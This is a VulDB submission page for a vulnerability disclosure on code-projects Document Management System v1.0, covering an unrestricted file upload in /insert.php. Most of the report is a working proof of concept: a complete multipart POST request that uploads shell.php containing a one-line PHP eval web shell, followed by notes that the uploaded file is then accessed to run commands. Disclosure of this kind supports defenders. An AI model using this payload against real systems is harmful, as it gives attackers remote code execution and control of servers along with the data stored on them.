Gửi #621411: code-projects document-management-system-in-php-with-source-code v1.0 Unrestricted Uploadthông tin

tiêu đề	code-projects document-management-system-in-php-with-source-code v1.0 Unrestricted Upload
Mô tả	# Document Management System In PHP With Source Code v1.0 /insert.php Unrestricted Upload ## Vendor Homepage https://code-projects.org/ ## submitter mawenjie ## Vulnerable File - /insert.php ## VERSION(S) - V1.0 ## Software Link - https://code-projects.org/document-management-system-in-php-with-source-code/ ## Vulnerability Type - Unrestricted Upload ## Root Cause Document Management System In PHP With Source Code v1.0 /insert.php,After logging in, uploading files when adding content to the page without any restrictions or filtering leads to an unlimited upload vulnerability. #### The source code is not filtered. <img width="787" height="395" alt="Image" src="https://github.com/user-attachments/assets/b0344071-d4e4-4d3d-b967-798abafbf58d" /> ## Impact File upload vulnerabilities are extremely harmful. Attackers can upload malicious scripts (such as WebShell) to directly control the server, view, tamper with or delete files, execute system commands, and even create administrator accounts. The server may become a "zombie" and be used for DDoS attacks, sending spam, etc. At the same time, the database is vulnerable to intrusion, sensitive information such as user privacy and commercial secrets may be stolen or tampered with, and website pages may be maliciously replaced, damaging the platform's reputation. In addition, the vulnerability may also become a springboard for attacking other systems, triggering chain security issues and posing multi-dimensional threats to servers, data and users. # DESCRIPTION PHP document management system, source code v1.0. After logging in, upload files when adding content to the page,In the page index.php, the upload function in the /insert.php file was referenced, triggering an unlimited upload vulnerability. There are no restrictions or filters. Remote attackers can pass malicious loads through this file upload function, causing file uploads to be unrestricted and further leading to remote code execution (RCE). # 漏洞详细信息和 POC ## Payload ```makefile POST /insert.php HTTP/1.1 Host: 192.168.126.133:8088 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=----geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8 Content-Length: 1608 Origin: http://192.168.126.133:8088 Connection: keep-alive Referer: http://192.168.126.133:8088/index.php Cookie: PHPSESSID=f3p49bjml603prg0rrp6drf5d5 Upgrade-Insecure-Requests: 1 Priority: u=0, i ------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8 Content-Disposition: form-data; name="field1" 5201- ------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8 Content-Disposition: form-data; name="anothercont" 1 ------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8 Content-Disposition: form-data; name="yr" ------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8 Content-Disposition: form-data; name="field2" external ------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8 Content-Disposition: form-data; name="field3" 1 ------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8 Content-Disposition: form-data; name="uploaded_file"; filename="shell.php" Content-Type: application/octet-stream <?php @eval($_POST['shell']);?> ------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8 Content-Disposition: form-data; name="field4" 1 ------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8 Content-Disposition: form-data; name="field5" 1 ------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8 Content-Disposition: form-data; name="field6" domesca ------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8 Content-Disposition: form-data; name="newco" 1 ------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8 Content-Disposition: form-data; name="field7" henry ------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8 Content-Disposition: form-data; name="anotheremp" 1 ------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8 Content-Disposition: form-data; name="field8" 2025-07-23 ------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8-- ``` <img width="811" height="424" alt="Image" src="https://github.com/user-attachments/assets/8aff60bd-b8cf-43d3-a8bf-608b8d968d6d" /> #### According to burp Data packet analysis Obtain the file path And access the execution command <img width="583" height="377" alt="Image" src="https://github.com/user-attachments/assets/12fcd569-82a4-4fc9-b1f0-2c536dcf1e98" />
Nguồn	⚠️ https://github.com/XiaoJiesecqwq/CVE/issues/4
Người dùng	Anonymous User
Đệ trình	23/07/2025 12:09 (cách đây 9 các tháng)
Kiểm duyệt	25/07/2025 09:38 (2 days later)
Trạng thái	được chấp nhận
Mục VulDB	317585 [code-projects Document Management System 1.0 /insert.php uploaded_file nâng cao đặc quyền]
điểm	20

◂ Trước Tổng Quan Tiếp theo ▸

Do you need the next level of professionalism?

Upgrade your account now!